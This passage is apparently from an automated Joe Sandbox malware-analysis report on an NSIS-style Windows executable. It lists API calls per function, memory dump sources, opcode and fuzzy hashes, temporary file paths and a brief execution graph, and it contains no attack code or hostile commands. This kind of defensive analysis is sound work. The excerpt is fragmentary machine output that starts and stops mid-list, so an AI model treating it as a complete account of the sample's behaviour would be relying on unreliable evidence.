                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
                                                  • Instruction ID: c7dec26b55dd312fec5fb3faf1598927ec34475db9096b9e5e75d52a628400f5
                                                  • Opcode Fuzzy Hash: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
                                                  • Instruction Fuzzy Hash: E521BDB1C00128BBDF216FA5DE49D9E7E79EF08364F10423AF964762E0CB794C418B98
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsy62D9.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsy62D9.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsy62D9.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsy62D9.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsy62D9.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWidelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsy62D9.tmp$C:\Users\user\AppData\Local\Temp\nsy62D9.tmp\System.dll
                                                  • API String ID: 3109718747-2948858247
                                                  • Opcode ID: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                  • Instruction ID: 59cf546ef3811be8ee7c727c8e5eea11e2141b44b9e391d5d171073bbb1e77e0
                                                  • Opcode Fuzzy Hash: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                  • Instruction Fuzzy Hash: F611EB72A01204BEDB146FB18E8EA9F77659F45398F20453BF102F61C1DAFC89415B5E
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: FreeGlobal
                                                  • String ID:
                                                  • API String ID: 2979337801-0
                                                  • Opcode ID: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
                                                  • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                  • Opcode Fuzzy Hash: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
                                                  • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401DB6
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                  • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E38
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID:
                                                  • API String ID: 3808545654-0
                                                  • Opcode ID: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
                                                  • Instruction ID: 8058adb7fc53f801c03006c9ef56a62efa99793a140a93f16ed6c143b7d909dc
                                                  • Opcode Fuzzy Hash: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
                                                  • Instruction Fuzzy Hash: 9A015271944240EFE701ABB4AE8A6D97FB49F95301F10457EE241F61E2CAB800459F2D
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                  • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                  • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                  • String ID:
                                                  • API String ID: 1148316912-0
                                                  • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                  • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                  • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                  • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                  • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                  • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: 9ccf06a462700f0ed3a97b5983b11f9e7e1ee2bcf46f86b5230f61e7ee9921c4
                                                  • Instruction ID: face61d34558c4de7c2b3a6e9a6cb1e1a296a7661f17e088ac2b3614559d71e0
                                                  • Opcode Fuzzy Hash: 9ccf06a462700f0ed3a97b5983b11f9e7e1ee2bcf46f86b5230f61e7ee9921c4
                                                  • Instruction Fuzzy Hash: 2DF0FF72604518AFDB01DBE4DF88CEEB7BCEB48341B14047AF641F6191CA749D019B78
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                  • Instruction ID: 74a91dccfe9731269d403f92625f9bdea7e35384dcad0b9637cdbdb8d435ba20
                                                  • Opcode Fuzzy Hash: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                  • Instruction Fuzzy Hash: 4D21C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB18
                                                  APIs
                                                  • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                  • wsprintfW.USER32 ref: 00404B4C
                                                  • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s
                                                  • API String ID: 3540041739-3551169577
                                                  • Opcode ID: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
                                                  • Instruction ID: a69b8d9c405cb410f429d1b91b3aaf5cd8934f07bb3ea9cf38393447591b3b6c
                                                  • Opcode Fuzzy Hash: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
                                                  • Instruction Fuzzy Hash: EA11EB736041283BDB00A66DDC42E9F369CDB81338F154237FA66F21D1D9B8D82146E8
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00405B59
                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00405B63
                                                  • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B75
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B53
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3081826266
                                                  • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                  • Instruction ID: 33d5b4b63083ad43afaa288e046e1f08ed21b79f7f5b9eb46acb358563388364
                                                  • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                  • Instruction Fuzzy Hash: 86D05E31101924AAC121BB549C04DDF63ACAE86304342087AF541B20A5C77C296286FD
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                                  • GetTickCount.KERNEL32 ref: 00402E8E
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                                  • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                  • Instruction ID: fb236cf74f4011b48551144809540ae7a3d608603197ef92b98d1837a73ee17d
                                                  • Opcode Fuzzy Hash: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                  • Instruction Fuzzy Hash: BDF05E30941620EBC6316B20FF0DA9B7B69BB44B42745497AF441B19E8C7B44881CBDC
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,004038D3,004036E9,00000006,?,00000006,00000008,0000000A), ref: 00403915
                                                  • GlobalFree.KERNEL32(?), ref: 0040391C
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040390D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-3081826266
                                                  • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                  • Instruction ID: e66732d9f8c7dde22b06ec40e1a6716a7c13e86cf839674f34118547447e98ef
                                                  • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                  • Instruction Fuzzy Hash: 95E012739019209BC6215F55ED08B5E7B68AF58B22F05447AE9807B26087B45C929BD8
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3507071243740008011.exe,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BA5
                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3507071243740008011.exe,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BB5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-224404859
                                                  • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                  • Instruction ID: a8af4f0e04a9cb416ac945bb8770274a79718c16fb62e87aa8b604c5d62251ee
                                                  • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                  • Instruction Fuzzy Hash: D5D05EB24019209AD3126B08DC00DAF73A8EF5230074A48AAE841A6165D7B87D8186AC
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                  • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                  • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                  • GlobalFree.KERNEL32(?), ref: 10001203
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                  • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                  • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                  • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D01
                                                  • CharNextA.USER32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D12
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                  • Instruction ID: eb4b2eb4961b7d09ea4a34ed08b3b50e56f073c3670a6d3e208c08a45fec6953
                                                  • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                  • Instruction Fuzzy Hash: 10F0F631204918FFD7029FA4DD0499FBBA8EF16350B2580BAE840FB211D674DE01AB98

                                                  Execution Graph

                                                  Execution Coverage:0%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:100%
                                                  Total number of Nodes:1
                                                  Total number of Limit Nodes:0
                                                  execution_graph 81223 36d92df0 LdrInitializeThunk

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1 36d935c0-36d935cc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 2af69828eadd72cc7d790b077e71691c1745cd6ab2fd93e069bd2c2a75f4360a
                                                  • Instruction ID: 7c285d80951b3836e40425ea0b0e2b6ba546558ca6b0ebcb126118c8323f4f4b
                                                  • Opcode Fuzzy Hash: 2af69828eadd72cc7d790b077e71691c1745cd6ab2fd93e069bd2c2a75f4360a
                                                  • Instruction Fuzzy Hash: A1900271B4960402D20071988514B06100647D0201F65C412A542463CD87958A5565A2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 36d92df0-36d92dfc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
